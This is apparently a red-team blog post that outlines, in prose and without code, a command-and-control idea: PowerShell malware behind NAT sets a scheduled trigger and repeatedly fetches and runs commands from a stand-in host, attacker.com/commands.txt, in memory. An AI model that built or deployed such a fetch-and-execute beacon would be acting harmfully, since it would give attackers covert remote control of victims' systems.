Breach the formidable NAT and proxies
The goal of this new technique is to illustrate the simplicity of exploit execution for command and control capabilities.
Though there are several techniques. But all are prevented by robust configurations and patched systems.
- Client Malware
- Internet facing webpage
Here we are assuming that the victim has internet access; though filtered
, NATed, behind firewall(s) and load balancing proxies. The thing under assumption is that victim can access https://attacker.com/commands.txt (at application layer; say a browser) and of course the victim system should be able to execute the malware.
The thing I’m trying to evade is having dedicated TCP connections, typical of a bind / reverse shell. Let’s say there can be no proper outgoing communication channel as per strict policies.
As stated earlier, initial malware has to be executed and deployed successfully. It could be a macro enabled document or executable. My research does not contain malware evasion or AV bypass, though the type of payload required is not suspicious and should be easy to deploy.
Now the malware contains dropper code. The malware has to do two things.
- Set a trigger / cron job that executes after certain time and
- Execute code at https://attacker.com/commands.txt in memory without saving it as a stagger or static file on secondary storage.
Now all we have to do is update the text file with updated comments. I prefer .ps1 extension for the commands file since my malware is mostly PowerShell based. But you could choose whatever fits the scenario as this is a concept.
Just note that the victim is behind NAT from attackers perspective; is still vulnerable; because the victim can open attacker.com and read any file hosted as it is on internet. This research provides red-teamers with added weapon in their arsenel. I’ll soon be publishing a technical PoC for this with GPL 3.0.
If you want to learn more, or if you are interested in helping with the project, head over to the GitHub.